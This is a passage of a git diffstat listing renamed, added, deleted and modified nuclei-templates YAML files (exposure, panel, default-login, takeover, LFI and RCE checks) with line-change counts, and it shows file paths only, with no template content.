.../Other/exposed-alps-spring.yaml | 31 - .../Other/exposed-authentication-asmx.yaml | 7 +- .../Other/exposed-bitkeeper-7291.yaml | 28 + nuclei-templates/Other/exposed-bitkeeper.yaml | 27 - ...exposed-bzr.yaml => exposed-bzr-7295.yaml} | 0 .../Other/exposed-darcs-7297.yaml | 24 + .../Other/exposed-darcs-7298.yaml | 23 - .../Other/exposed-docker-api-7299.yaml | 29 - .../Other/exposed-docker-api.yaml | 30 + nuclei-templates/Other/exposed-dockerd.yaml | 10 +- .../Other/exposed-file-upload-form.yaml | 6 +- .../Other/exposed-gitignore-7303.yaml | 35 + .../Other/exposed-gitignore-7304.yaml | 39 - ...309.yaml => exposed-glances-api-7308.yaml} | 0 .../exposed-jquery-file-upload-7315.yaml | 24 - .../Other/exposed-jquery-file-upload.yaml | 21 + .../Other/exposed-kafdrop-7316.yaml | 16 + nuclei-templates/Other/exposed-kafdrop.yaml | 19 - ...d-kibana.yaml => exposed-kibana-7320.yaml} | 0 ...l.yaml => exposed-mysql-initial-7322.yaml} | 0 .../Other/exposed-nomad-7329.yaml | 30 + nuclei-templates/Other/exposed-nomad.yaml | 40 - nuclei-templates/Other/exposed-pii.yaml | 140 - .../Other/exposed-prometheus-log-7333.yaml | 24 - .../Other/exposed-prometheus-log-7334.yaml | 24 + .../Other/exposed-redis-7338.yaml | 23 + nuclei-templates/Other/exposed-redis.yaml | 27 - ...now.yaml => exposed-service-now-7342.yaml} | 0 .../Other/exposed-sharepoint-list.yaml | 6 +- .../Other/exposed-sqlite-manager.yaml | 6 +- ...exposed-svn.yaml => exposed-svn-7351.yaml} | 0 ...d-vscode.yaml => exposed-vscode-7357.yaml} | 0 .../Other/exposed-zookeeper-7362.yaml | 22 + .../Other/express-default-page.yaml | 5 +- nuclei-templates/Other/express-lfr.yaml | 52 +- .../Other/express-stack-trace.yaml | 7 +- .../Other/external-service-interaction.yaml | 15 +- ...tract-urls.yaml => extract-urls-7368.yaml} | 0 .../Other/extreme-netconfig-ui-7372.yaml | 60 +- nuclei-templates/Other/extron-cms-panel.yaml | 14 +- ...no-lfd.yaml => eyelock-nano-lfd-7373.yaml} | 0 .../Other/eyesofnetwork-detect.yaml | 6 +- .../Other/eyou-email-rce-7382.yaml | 28 + nuclei-templates/Other/eyou-email-rce.yaml | 24 - nuclei-templates/Other/ez-publish-panel.yaml | 10 +- .../Other/f-secure-policy-manager-7560.yaml | 23 - .../Other/f-secure-policy-manager-7564.yaml | 20 + .../Other/facebook-api-token.yaml | 6 +- ...t-id.yaml => facebook-client-id-7384.yaml} | 0 .../Other/facebook-for-woocommerce.yaml | 4 +- nuclei-templates/Other/facebook-page.yaml | 9 +- .../Other/facturascripts-installer.yaml | 5 +- ...l => fanruan-channel-deserialization.yaml} | 0 ...detect.yaml => fanruanoa-detect-7391.yaml} | 0 ...ct.yaml => fanruanoa2012-detect-7388.yaml} | 0 ...aml => fanruanoa2012-disclosure-7389.yaml} | 0 nuclei-templates/Other/faraday-login.yaml | 3 +- nuclei-templates/Other/fastAPI-1.yaml | 25 + nuclei-templates/Other/fastAPI-2.yaml | 25 + nuclei-templates/Other/fastAPI-3.yaml | 25 + nuclei-templates/Other/fastAPI-4.yaml | 25 + nuclei-templates/Other/fastAPI-5.yaml | 25 + nuclei-templates/Other/fastcgi-echo.yaml | 10 +- ...rce.yaml => fastjson-1-2-24-rce-7400.yaml} | 0 ...rce.yaml => fastjson-1-2-41-rce-7404.yaml} | 0 ...rce.yaml => fastjson-1-2-42-rce-7408.yaml} | 0 ...rce.yaml => fastjson-1-2-43-rce-7411.yaml} | 0 ...rce.yaml => fastjson-1-2-47-rce-7415.yaml} | 0 .../Other/fastjson-1-2-67-rce-7423.yaml | 40 + .../Other/fastjson-1-2-67-rce.yaml | 33 - ...rce.yaml => fastjson-1-2-68-rce-7425.yaml} | 0 nuclei-templates/Other/fastjson-version.yaml | 9 +- nuclei-templates/Other/fastly-api-token.yaml | 5 +- .../Other/fastly-takeover-7429.yaml | 18 + nuclei-templates/Other/fastly-takeover.yaml | 18 - .../fastpanel-hosting-control-panel.yaml | 9 +- .../Other/fatpipe-auth-bypass.yaml | 5 - ...436.yaml => fatpipe-ipvpn-panel-7435.yaml} | 0 .../favicon-by-realfavicongenerator.yaml | 2 +- nuclei-templates/Other/favicon-detect.yaml | 1192 +- .../Other/favicon-detection-7442.yaml | 573 +- nuclei-templates/Other/fb-access-token.yaml | 6 +- nuclei-templates/Other/fcm-api-key.yaml | 5 +- ...s-xss.yaml => feedwordpress-xss-7459.yaml} | 0 .../Other/feifeicms-lfr-7462.yaml | 33 + .../Other/feifeicms-lfr-7465.yaml | 29 - nuclei-templates/Other/ffserver-status.yaml | 7 +- .../Other/fhem-6-unauthenticated-lfi.yaml | 4 - .../Other/figma-access-token.yaml | 5 +- nuclei-templates/Other/file-scheme-7467.yaml | 16 + nuclei-templates/Other/file-scheme.yaml | 15 - .../Other/filebrowser-login-panel.yaml | 8 +- nuclei-templates/Other/filezilla-7471.yaml | 25 + nuclei-templates/Other/filezilla.yaml | 31 - .../Other/fine-report-v9-file-upload.yaml | 10 +- nuclei-templates/Other/finecms-sqli-7475.yaml | 9 +- .../Other/finereport-path-traversal-7478.yaml | 31 + .../Other/finereport-path-traversal.yaml | 27 - nuclei-templates/Other/finger-detect.yaml | 10 +- ...fingerprinthub-web-fingerprints-7480.yaml} | 0 .../Other/finicity-api-token.yaml | 5 +- .../Other/finicity-client-secret.yaml | 5 +- .../Other/finicity-clientsecret.yaml | 5 +- nuclei-templates/Other/finicity-token.yaml | 5 +- .../Other/finnhub-access-token.yaml | 5 +- .../Other/finnhub-accesstoken.yaml | 5 +- nuclei-templates/Other/fiori-launchpad.yaml | 12 +- ...on.yaml => fiorilaunchpad-logon-7484.yaml} | 0 ...aml => firebase-config-exposure-7486.yaml} | 0 .../Other/firebase-database-7489.yaml | 17 - .../Other/firebase-database-extractor.yaml | 7 +- nuclei-templates/Other/firebase-database.yaml | 17 + .../Other/firebase-debug-log.yaml | 5 +- ...ct-7493.yaml => firebase-detect-7496.yaml} | 0 .../Other/firebase-urls-7498.yaml | 23 + nuclei-templates/Other/firebase-urls.yaml | 27 - ...fireware-xtm-user-authentication-7501.yaml | 23 - .../fireware-xtm-user-authentication.yaml | 20 + .../Other/flahscookie-superadmin-panel.yaml | 9 +- nuclei-templates/Other/flamingo.yaml | 2 +- .../Other/flask-werkzeug-debug.yaml | 7 +- nuclei-templates/Other/flatpress-xss.yaml | 10 +- .../Other/flexbe-takeover-7506.yaml | 27 + nuclei-templates/Other/flexbe-takeover.yaml | 23 - nuclei-templates/Other/flexnet_publisher.yaml | 20 + .../Other/flightpath-panel-7507.yaml | 25 + nuclei-templates/Other/flightpath-panel.yaml | 31 - ...exposure.yaml => flink-exposure-7511.yaml} | 0 nuclei-templates/Other/flip-cms-panel.yaml | 8 +- .../Other/flir-default-login-7513.yaml | 35 + .../Other/flir-default-login.yaml | 42 - .../Other/flir-path-traversal-7521.yaml | 25 - .../Other/flir-path-traversal-7522.yaml | 21 + nuclei-templates/Other/floating-contact.yaml | 59 + .../Other/flow-flow-social-stream-xss.yaml | 5 - nuclei-templates/Other/flowci-detection.yaml | 3 - nuclei-templates/Other/flowci-panel.yaml | 11 +- nuclei-templates/Other/fluentform.yaml | 4 +- .../Other/flureedb-admin-console.yaml | 9 +- .../Other/flyway-spring-boot.yaml | 2 - nuclei-templates/Other/flywheel-takeover.yaml | 18 + nuclei-templates/Other/flywheel_takeover.yaml | 19 - nuclei-templates/Other/font-awesome.yaml | 2 +- nuclei-templates/Other/footprints-panel.yaml | 9 +- .../Other/force-regenerate-thumbnails.yaml | 2 +- nuclei-templates/Other/formidable.yaml | 4 +- nuclei-templates/Other/forminator.yaml | 2 +- nuclei-templates/Other/fortiadc-panel.yaml | 12 +- nuclei-templates/Other/fortiap-panel.yaml | 12 +- .../Other/fortiauthenticator-detect.yaml | 8 +- .../Other/forticlientems-panel.yaml | 4 +- ...l-panel.yaml => fortimail-panel-7531.yaml} | 0 nuclei-templates/Other/fortinet-detect.yaml | 4 - .../Other/fortinet-fortiddos-panel.yaml | 8 +- .../Other/fortinet-fortigate-panel-7535.yaml | 16 + .../Other/fortinet-fortigate-panel.yaml | 20 - .../Other/fortinet-fortimanager-panel.yaml | 6 +- .../Other/fortinet-fortinac-panel.yaml | 8 +- .../Other/fortios-management-panel.yaml | 13 +- .../Other/fortios-open-redirect.yaml | 4 - nuclei-templates/Other/fortios-panel.yaml | 12 +- nuclei-templates/Other/fortiportal.yaml | 20 + .../Other/fortitester-login-panel.yaml | 13 +- .../Other/fortiweb-panel-7537.yaml | 25 + nuclei-templates/Other/fortiweb-panel.yaml | 25 - nuclei-templates/Other/fortiwlm-panel.yaml | 6 +- nuclei-templates/Other/framework.yaml | 24 + nuclei-templates/Other/freeipa-panel.yaml | 8 +- .../{2755030215.yaml => freelancer.yaml} | 0 .../Other/freepbx-administration-panel.yaml | 14 +- .../Other/freshdesk-takeover-7540.yaml | 26 + .../Other/freshdesk-takeover.yaml | 22 - nuclei-templates/Other/friendica-panel.yaml | 8 +- .../Other/front-page-misconfig-7546.yaml | 25 + .../Other/front-page-misconfig.yaml | 22 - .../Other/frontify-takeover-7544.yaml | 17 + nuclei-templates/Other/frontify-takeover.yaml | 18 - .../Other/froxlor-database-backup.yaml | 12 +- .../Other/froxlor-detect-7551.yaml | 24 + nuclei-templates/Other/froxlor-detect.yaml | 24 - .../Other/froxlor-management-panel.yaml | 13 +- nuclei-templates/Other/froxlor-xss.yaml | 13 +- nuclei-templates/Other/froxlor.yaml | 20 + .../Other/frp-default-login-7559.yaml | 34 + nuclei-templates/Other/frp-default-login.yaml | 35 - ...ver-listDir.yaml => frserver-listdir.yaml} | 0 nuclei-templates/Other/ftm-manager-panel.yaml | 16 +- .../Other/ftp-anonymous-login.yaml | 17 +- .../Other/ftp-default-credentials.yaml | 30 + nuclei-templates/Other/ftp-default-creds.yaml | 22 - .../Other/ftp-weak-credentials-7569.yaml | 37 + .../Other/ftp-weak-credentials.yaml | 35 - nuclei-templates/Other/ftpconfig-7565.yaml | 32 + nuclei-templates/Other/ftpconfig.yaml | 25 - .../Other/fuelcms-default-login-7572.yaml | 54 + .../Other/fuelcms-default-login.yaml | 62 - nuclei-templates/Other/fuelcms-panel.yaml | 13 +- .../Other/fuji-xerox-printer-detect.yaml | 9 +- nuclei-templates/Other/fumengyun-sqli.yaml | 54 + .../Other/fusionauth-admin-panel.yaml | 8 +- ...uzzing-xss-get-params-html-injection.yaml} | 0 ...t-params-javascript-context-injection.yaml | 58 +- nuclei-templates/Other/g0.yaml | 20 + .../Other/ga-google-analytics.yaml | 4 +- .../Other/ganglia-cluster-dashboard.yaml | 10 +- ...aml => ganglia-xml-grid-monitor-7574.yaml} | 0 .../Other/{2848712183.yaml => ganglia.yaml} | 0 nuclei-templates/Other/gargoyle-router.yaml | 9 +- .../Other/gcloud-access-token.yaml | 6 +- .../Other/gcloud-config-default.yaml | 8 +- .../Other/gcloud-credentials.yaml | 6 +- .../Other/gemfury-takeover-7578.yaml | 15 + nuclei-templates/Other/gemfury-takeover.yaml | 18 - .../Other/general-tokens-7583.yaml | 45 - nuclei-templates/Other/general-tokens.yaml | 46 + nuclei-templates/Other/generic-c2-jarm.yaml | 5 +- nuclei-templates/Other/generic-env.yaml | 50 +- nuclei-templates/Other/generic-j2ee-lfi.yaml | 36 +- .../Other/generic-linux-lfi-7589.yaml | 45 + .../Other/generic-path-traversal.yaml | 32 +- nuclei-templates/Other/generic-rfi.yaml | 34 - nuclei-templates/Other/generic-ssrf.yaml | 2 +- ...lfi.yaml => generic-windows-lfi-7591.yaml} | 0 .../Other/geniusocean-installer.yaml | 5 +- nuclei-templates/Other/genweb-plus-panel.yaml | 8 +- .../Other/geo-webserver-detect.yaml | 7 +- .../Other/geoserver-default-login.yaml | 10 +- .../Other/geoserver-login-panel.yaml | 15 +- .../geovision-geowebserver-lfi-7596.yaml | 32 + .../Other/geovision-geowebserver-lfi.yaml | 30 - ...e-detect-7604.yaml => gespage-detect.yaml} | 0 ...age-panel.yaml => gespage-panel-7606.yaml} | 0 .../Other/get-access-token-json.yaml | 6 +- .../Other/getresponse-takeover-7610.yaml | 15 + .../Other/getresponse-takeover.yaml | 18 - ...ct.yaml => getsimple-cms-detect-7614.yaml} | 0 .../Other/getsimple-cms-detector-7612.yaml | 22 + .../Other/getsimple-installation-7618.yaml | 4 - ...le-leakage.yaml => getsimple-leakage.yaml} | 0 nuclei-templates/Other/ghost-admin-panel.yaml | 2 - .../Other/ghost-takeover-7620.yaml | 20 + .../Other/ghost-takeover-7622.yaml | 24 - .../Other/gira-homeserver-homepage.yaml | 9 +- nuclei-templates/Other/git-config-7633.yaml | 31 + .../git-config-nginxoffbyslash-7632.yaml | 38 + .../Other/git-config-nginxoffbyslash.yaml | 28 - nuclei-templates/Other/git-config.yaml | 29 - ...entials.yaml => git-credentials-7643.yaml} | 0 .../git-credentials-disclosure-7640.yaml | 32 - .../git-credentials-disclosure-7641.yaml | 27 + nuclei-templates/Other/git-exposure.yaml | 6 +- nuclei-templates/Other/git-logs-exposure.yaml | 8 +- nuclei-templates/Other/git-mailmap-7710.yaml | 38 - nuclei-templates/Other/git-mailmap.yaml | 38 + .../Other/git-repository-browser.yaml | 15 +- nuclei-templates/Other/gitblit-panel.yaml | 13 +- nuclei-templates/Other/gitbook-detect.yaml | 2 +- .../Other/gitbook-takeover-7626.yaml | 31 + nuclei-templates/Other/gitbook-takeover.yaml | 19 - nuclei-templates/Other/gitea-installer.yaml | 5 +- nuclei-templates/Other/gitea-login-7646.yaml | 5 - nuclei-templates/Other/gitea-login-check.yaml | 5 +- .../Other/gitea-public-signup.yaml | 6 +- nuclei-templates/Other/github-app-token.yaml | 8 +- nuclei-templates/Other/github-debug.yaml | 5 +- .../Other/github-enterprise-detect.yaml | 2 +- .../Other/github-login-check.yaml | 4 +- .../Other/github-oauth-token.yaml | 4 +- .../Other/github-outdated-key.yaml | 5 +- .../Other/github-page-config.yaml | 4 +- ...n.yaml => github-personal-token-7657.yaml} | 0 .../Other/github-refresh-token.yaml | 4 +- .../Other/github-takeover-7661.yaml | 24 - .../Other/github-takeover-7662.yaml | 25 + .../github-workflows-disclosure-7665.yaml | 54 - .../Other/github-workflows-disclosure.yaml | 51 + nuclei-templates/Other/github.yaml | 41 +- .../Other/gitlab-api-user-enum-7668.yaml | 35 + .../Other/gitlab-api-user-enum.yaml | 39 - .../Other/gitlab-detect-7670.yaml | 25 - .../Other/gitlab-detect-7672.yaml | 25 + .../Other/gitlab-login-check-self-hosted.yaml | 5 +- .../Other/gitlab-personal-accesstoken.yaml | 5 +- .../Other/gitlab-pipeline-triggertoken.yaml | 5 +- ...pos.yaml => gitlab-public-repos-7680.yaml} | 0 .../Other/gitlab-public-signup.yaml | 10 +- .../Other/gitlab-public-snippets-7686.yaml | 33 - .../Other/gitlab-public-snippets-7688.yaml | 32 + nuclei-templates/Other/gitlab-rce-7693.yaml | 55 + nuclei-templates/Other/gitlab-rce.yaml | 63 - .../Other/gitlab-runner-regtoken.yaml | 5 +- .../gitlab-uninitialized-password-7695.yaml | 38 + .../Other/gitlab-uninitialized-password.yaml | 47 - .../Other/gitlab-user-enum-7700.yaml | 30 + nuclei-templates/Other/gitlab-user-enum.yaml | 37 - .../Other/gitlab-user-open-api-7702.yaml | 39 + .../Other/gitlab-weak-login-7705.yaml | 56 - .../Other/gitlab-weak-login-7706.yaml | 51 + nuclei-templates/Other/gitlab-workflow.yaml | 2 + ...sure.yaml => gitlist-disclosure-7709.yaml} | 0 nuclei-templates/Other/gitter-token.yaml | 5 +- .../Other/global-domains-xss.yaml | 3 +- .../Other/global-traffic-statistics.yaml | 5 +- .../Other/globalprotect-panel-7721.yaml | 21 + .../Other/globalprotect-panel.yaml | 15 - nuclei-templates/Other/gloo-unauth.yaml | 5 - nuclei-templates/Other/glowroot-panel.yaml | 5 +- .../Other/glpi-9.3.3-sql-injection.yaml | 30 + .../Other/glpi-authentication-7727.yaml | 25 + .../Other/glpi-authentication.yaml | 24 - .../Other/glpi-default-credential.yaml | 7 - .../Other/glpi-default-login-7731.yaml | 18 +- ....yaml => glpi-directory-listing-7734.yaml} | 0 .../Other/glpi-fusioninventory-misconfig.yaml | 2 - nuclei-templates/Other/glpi-login-1.yaml | 22 + nuclei-templates/Other/glpi-login-2.yaml | 22 + .../{glpi-login.yaml => glpi-login-7736.yaml} | 0 nuclei-templates/Other/glpi-status-page.yaml | 5 +- ...ml => glpi-telemetry-disclosure-7738.yaml} | 0 ...ting.yaml => glpidirectorylisting(1).yaml} | 0 .../Other/gnu-inetutils-ftpd-detect.yaml | 59 +- nuclei-templates/Other/gnu-mailman.yaml | 10 +- nuclei-templates/Other/gnuboard-sms-xss.yaml | 11 +- nuclei-templates/Other/gnuboard5-rxss.yaml | 11 +- nuclei-templates/Other/gnuboard5-xss.yaml | 11 +- nuclei-templates/Other/gnuboard5.yaml | 22 + .../Other/go-anywhere-client-7743.yaml | 21 - .../Other/go-anywhere-client.yaml | 21 + nuclei-templates/Other/go-mod-disclosure.yaml | 5 +- .../Other/goanywhere-mft-log4j-rce.yaml | 43 +- .../Other/goanywhere-mft-login.yaml | 15 +- .../Other/gocd-cruise-configuration-7748.yaml | 31 + .../Other/gocd-cruise-configuration.yaml | 27 - nuclei-templates/Other/gocd-login-7751.yaml | 24 + nuclei-templates/Other/gocd-login-7753.yaml | 24 - .../Other/gogs-install-exposure-7755.yaml | 25 - .../Other/gogs-install-exposure.yaml | 21 + nuclei-templates/Other/gogs-panel.yaml | 14 +- nuclei-templates/Other/goip-1-lfi-7764.yaml | 26 + nuclei-templates/Other/goip-1-lfi.yaml | 31 - .../Other/goip-default-login.yaml | 16 +- ...-metrics.yaml => golang-metrics-7765.yaml} | 0 nuclei-templates/Other/golangci-config.yaml | 15 +- nuclei-templates/Other/goliath-detect.yaml | 5 +- nuclei-templates/Other/goodjob-dashboard.yaml | 4 +- .../google-analytics-dashboard-for-wp.yaml | 4 +- .../Other/google-analytics-for-wordpress.yaml | 2 +- ...-api-key.yaml => google-api-key-7770.yaml} | 0 .../Other/google-api-private-key.yaml | 6 +- nuclei-templates/Other/google-clientid.yaml | 5 +- .../Other/google-floc-disabled-7784.yaml | 20 + .../Other/google-floc-disabled.yaml | 17 - .../Other/google-frontend-httpserver.yaml | 5 +- .../Other/google-listings-and-ads.yaml | 4 +- .../Other/google-oauth-clientsecret.yaml | 5 +- .../Other/google-safebrowsing.yaml | 10 +- .../Other/google-services-json.yaml | 6 +- nuclei-templates/Other/google-site-kit.yaml | 2 +- .../Other/google-sitemap-generator.yaml | 4 +- .../Other/google-storage-7788.yaml | 18 + .../Other/google-storage-bucket.yaml | 3 +- nuclei-templates/Other/google-storage.yaml | 18 - ...aces.yaml => google-textsearchplaces.yaml} | 0 nuclei-templates/Other/gopher-detect.yaml | 12 +- nuclei-templates/Other/gopher-detection.yaml | 5 +- ...3.yaml => gophish-default-login-7792.yaml} | 0 .../Other/gophish-login-7796.yaml | 23 + nuclei-templates/Other/gophish-login.yaml | 23 - nuclei-templates/Other/gotify-panel.yaml | 10 +- nuclei-templates/Other/gozi-malware-c2.yaml | 5 +- nuclei-templates/Other/gpc-json.yaml | 9 +- .../Other/gradio-CVE-2024-1183.yaml | 36 - .../Other/gradle-cache-node-detect.yaml | 7 +- .../gradle-enterprise-build-cache-detect.yaml | 3 - ...yaml => gradle-enterprise-panel-7799.yaml} | 0 nuclei-templates/Other/gradle-libs.yaml | 8 +- .../Other/grafana-default-login-7804.yaml | 42 + .../Other/grafana-default-login.yaml | 48 - .../Other/grafana-detect-7807.yaml | 23 - .../Other/grafana-detect-7808.yaml | 23 + nuclei-templates/Other/grafana-file-read.yaml | 36 + .../Other/grafana-login-check.yaml | 5 +- ...6.yaml => grafana-public-signup-7814.yaml} | 0 nuclei-templates/Other/grafana-workflow.yaml | 8 +- ...> grails-database-admin-console-7819.yaml} | 0 ...randstream-device-configuration-7823.yaml} | 0 nuclei-templates/Other/graphite-browser.yaml | 3 +- .../Other/graphql-alias-batching-7826.yaml | 55 + .../Other/graphql-alias-batching.yaml | 41 - .../Other/graphql-array-batching-7828.yaml | 24 +- .../Other/graphql-detect-7830.yaml | 158 - .../Other/graphql-detect-7831.yaml | 158 + .../Other/graphql-field-suggestion-7834.yaml | 11 +- .../Other/graphql-get-method-7836.yaml | 34 + .../Other/graphql-get-method.yaml | 32 - .../Other/graphql-playground.yaml | 5 +- nuclei-templates/Other/graphql.yaml | 12 +- nuclei-templates/Other/grat2-c2-jarm.yaml | 5 +- ...-detect.yaml => grav-cms-detect-7842.yaml} | 0 nuclei-templates/Other/gravatar.yaml | 41 +- .../Other/graylog-api-browser-7846.yaml | 22 + .../Other/graylog-api-browser.yaml | 26 - nuclei-templates/Other/graylog-log4j.yaml | 40 +- nuclei-templates/Other/graylog-panel.yaml | 4 +- nuclei-templates/Other/greenbone-panel.yaml | 8 +- .../Other/grimag-open-redirect.yaml | 2 +- nuclei-templates/Other/group-ib-panel.yaml | 12 +- .../Other/groupoffice-lfi-7851.yaml | 26 + nuclei-templates/Other/groupoffice-lfi.yaml | 28 - ...sure.yaml => gruntfile-exposure-7852.yaml} | 0 nuclei-templates/Other/gryphon-login.yaml | 16 +- nuclei-templates/Other/gsoap-lfi-7855.yaml | 10 +- .../Other/gt-ac2900-login(1).yaml | 23 + nuclei-templates/Other/gtranslate.yaml | 2 +- .../Other/guacamole-default-login-7858.yaml | 46 + .../Other/guacamole-default-login-7861.yaml | 44 - nuclei-templates/Other/guard-config.yaml | 7 +- ...-detect.yaml => gunicorn-detect-7863.yaml} | 0 nuclei-templates/Other/gutenberg.yaml | 2 +- nuclei-templates/Other/gyra-master-admin.yaml | 9 +- .../Other/h2console-panel-7866.yaml | 24 - nuclei-templates/Other/h2console-panel.yaml | 20 + ...nly-nuclei.yaml => h2csmuggle-nuclei.yaml} | 0 ...h3c-imc-rce.yaml => h3c-imc-rce-7870.yaml} | 0 ...pass.yaml => h3c-secpath-loginbypass.yaml} | 0 nuclei-templates/Other/hack5-cloud-c2.yaml | 6 +- ...xposure.yaml => hadoop-exposure-7872.yaml} | 0 ...op-unauth.yaml => hadoop-unauth-7875.yaml} | 0 nuclei-templates/Other/hadoop-unauth-rce.yaml | 14 +- .../Other/haivision-gateway-panel.yaml | 6 +- .../Other/haivision-media-platform-panel.yaml | 6 +- .../Other/hangfire-dashboard.yaml | 13 +- nuclei-templates/Other/hanming-lfr-7879.yaml | 7 +- nuclei-templates/Other/hanta-rce.yaml | 4 +- nuclei-templates/Other/hanwang-detect.yaml | 8 +- .../Other/happy-elementor-addons.yaml | 2 +- .../Other/haproxy-exporter-metrics.yaml | 7 +- .../Other/haproxy-status-7883.yaml | 21 + nuclei-templates/Other/haproxy-status.yaml | 23 - .../Other/harbor-detect-7886.yaml | 4 - nuclei-templates/Other/harbor-panel.yaml | 14 +- .../Other/hashicorp-boundary-detect.yaml | 6 +- .../Other/hashicorp-consul-agent.yaml | 19 +- .../Other/hashicorp-consul-rce-7891.yaml | 33 + .../Other/hashicorp-consul-rce-7894.yaml | 32 - .../Other/hashicorp-consul-version.yaml | 4 - .../Other/hashicorp-consul-webgui-7898.yaml | 37 - .../Other/hashicorp-consul-webgui.yaml | 39 + .../Other/hasura-graphql-ssrf-7903.yaml | 45 - .../Other/hasura-graphql-ssrf-7905.yaml | 42 + .../Other/hatenablog-takeover.yaml | 7 +- nuclei-templates/Other/havoc-c2-jarm.yaml | 5 +- nuclei-templates/Other/havoc-c2.yaml | 5 +- nuclei-templates/Other/hb-audio-lfi-7911.yaml | 37 + nuclei-templates/Other/hb-audio-lfi.yaml | 24 - .../Other/hcpanywhere-detect.yaml | 2 +- .../Other/header-and-footer-scripts.yaml | 6 +- .../header-blind-time-sql-injection.yaml | 57 + .../Other/header-footer-code-manager.yaml | 2 +- .../Other/header-footer-elementor.yaml | 2 +- nuclei-templates/Other/header-footer.yaml | 2 +- nuclei-templates/Other/header_sqli.yaml | 4 +- .../Other/headless-open-redirect.yaml | 199 +- .../Other/health-check-lfi-7922.yaml | 7 +- nuclei-templates/Other/health-check.yaml | 2 +- .../Other/healthchecks-ui-exposure.yaml | 6 +- nuclei-templates/Other/hello-dolly.yaml | 2 +- ...7925.yaml => helpjuice-takeover-7927.yaml} | 0 .../Other/helprace-takeover-7931.yaml | 20 + nuclei-templates/Other/helprace-takeover.yaml | 17 - nuclei-templates/Other/heroku-key.yaml | 5 +- nuclei-templates/Other/heroku-takeover.yaml | 3 - nuclei-templates/Other/hestia-panel.yaml | 10 +- .../Other/hetzner-cloud-detect.yaml | 5 +- nuclei-templates/Other/heuristic-scan.yaml | 14 +- nuclei-templates/Other/hfs-exposure.yaml | 5 +- nuclei-templates/Other/hg255s.yaml | 20 + nuclei-templates/Other/hg532e.yaml | 20 + nuclei-templates/Other/hiboss-rce-7948.yaml | 25 + nuclei-templates/Other/hiboss-rce-7949.yaml | 31 - .../hide-security-enhancer-lfi-7952.yaml | 23 + .../Other/hide-security-enhancer-lfi.yaml | 35 - .../Other/highmail-admin-panel.yaml | 17 +- nuclei-templates/Other/hikvision-detect.yaml | 8 +- .../Other/hikvision-detection-1.yaml | 21 + .../Other/hikvision-detection-7955.yaml | 21 + .../Other/hikvision-detection.yaml | 25 - ...eak.yaml => hikvision-info-leak-7958.yaml} | 0 .../Other/hivemanager-login-panel-7966.yaml | 19 - .../Other/hivemanager-login-panel.yaml | 20 + nuclei-templates/Other/hivequeue-agent.yaml | 5 +- ...yaml => hjtcloud-arbitrary-file-read.yaml} | 0 ...jtcloud-rest-arbitrary-file-read-7976.yaml | 36 + .../hjtcloud-rest-arbitrary-file-read.yaml | 34 - ...l-7978.yaml => hmc-hybris-panel-7977.yaml} | 0 .../Other/home-assistant-7981.yaml | 1 - .../Other/home-assistant-panel.yaml | 6 +- .../homeautomation-v3-openredirect-7982.yaml | 20 - .../Other/homeautomation-v3-openredirect.yaml | 16 + nuclei-templates/Other/homebridge-panel.yaml | 5 +- nuclei-templates/Other/homematic-panel.yaml | 18 +- nuclei-templates/Other/homer-panel.yaml | 5 +- .../Other/homeworks-illumination.yaml | 5 +- .../Other/{3867691789.yaml => honeypot.yaml} | 0 .../honeywell-building-control-7987.yaml | 20 + .../Other/honeywell-building-control.yaml | 24 - .../Other/honeywell-scada-config.yaml | 4 +- .../Other/honeywell-web-controller-7995.yaml | 23 + .../Other/honeywell-web-controller.yaml | 24 - .../Other/honeywell-xl-web-controller.yaml | 9 +- .../Other/hongdian-default-login-7998.yaml | 48 - .../Other/hongdian-default-login.yaml | 41 + nuclei-templates/Other/hookbot-rat.yaml | 5 +- nuclei-templates/Other/horde-login-panel.yaml | 11 +- .../Other/horde-webmail-login.yaml | 11 +- .../Other/hospital-management-panel.yaml | 14 +- .../Other/hospital-management-xss.yaml | 10 +- .../Other/hospital-management-xss2.yaml | 10 +- .../Other/host-header-auth-bypass.yaml | 4 - ...soning.yaml => host-header-poisoning.yaml} | 0 .../Other/hp-blade-admin-detect-8005.yaml | 24 + .../Other/hp-blade-admin-detect.yaml | 24 - .../hp-color-laserjet-4700-webserver.yaml | 6 +- .../hp-color-laserjet-cp4025-webserver.yaml | 6 +- .../hp-color-laserjet-cp4525-webserver.yaml | 6 +- .../hp-color-laserjet-cp5225n-webserver.yaml | 6 +- .../hp-color-laserjet-cp5520-webserver.yaml | 6 +- .../Other/hp-color-laserjet-detect-8006.yaml | 44 - .../Other/hp-color-laserjet-detect.yaml | 31 + .../hp-color-laserjet-m553-webserver.yaml | 6 +- .../hp-color-laserjet-m652-webserver.yaml | 6 +- .../hp-color-laserjet-m653-webserver.yaml | 6 +- .../hp-color-laserjet-mfp-m577-webserver.yaml | 6 +- .../Other/hp-designjet-z5200-webserver.yaml | 6 +- ...9.yaml => hp-device-info-detect-8008.yaml} | 0 .../{hp-ilo-5-8021.yaml => hp-ilo-5.yaml} | 0 ...=> hp-ilo-serial-key-disclosure-8023.yaml} | 0 .../Other/hp-laserjet-600-m602-webserver.yaml | 6 +- .../Other/hp-laserjet-9040-webserver.yaml | 6 +- .../Other/hp-laserjet-detect-8028.yaml | 22 - .../Other/hp-laserjet-detect.yaml | 21 + .../hp-laserjet-flow-mfp-m527-webserver.yaml | 6 +- .../Other/hp-laserjet-m605-webserver.yaml | 6 +- .../Other/hp-laserjet-m609-webserver.yaml | 6 +- .../Other/hp-laserjet-mfp-m528-webserver.yaml | 6 +- .../Other/hp-laserjet-mfp-m725-webserver.yaml | 4 - .../Other/hp-laserjet-p4015-webserver.yaml | 6 +- .../Other/hp-laserjet-p4515-webserver.yaml | 6 +- .../Other/hp-media-vault-detect.yaml | 49 +- .../Other/hp-switch-default-login-8036.yaml | 37 + .../Other/hp-switch-default-login.yaml | 29 - .../hpe-system-management-anonymous-8013.yaml | 21 + .../hpe-system-management-anonymous.yaml | 21 - .../Other/hpe-system-management-login.yaml | 54 +- ...l => hrsale-unauthenticated-lfi-8039.yaml} | 0 nuclei-templates/Other/hsort-fileRead.yaml | 3 - .../{hst-fileread.yaml => hst-fileRead.yaml} | 0 .../Other/htaccess-config-8044.yaml | 26 + nuclei-templates/Other/htaccess-config.yaml | 18 - ...tion.yaml => htpasswd-detection-8046.yaml} | 0 ...> http-missing-security-headers-8058.yaml} | 0 .../{http-raw-multiple.yaml => http-raw.yaml} | 0 nuclei-templates/Other/http-trace.yaml | 3 +- .../Other/http-username-password.yaml | 13 +- ...ts-header.yaml => http-xframe-header.yaml} | 0 nuclei-templates/Other/httpbin-detection.yaml | 3 - ...t.yaml => 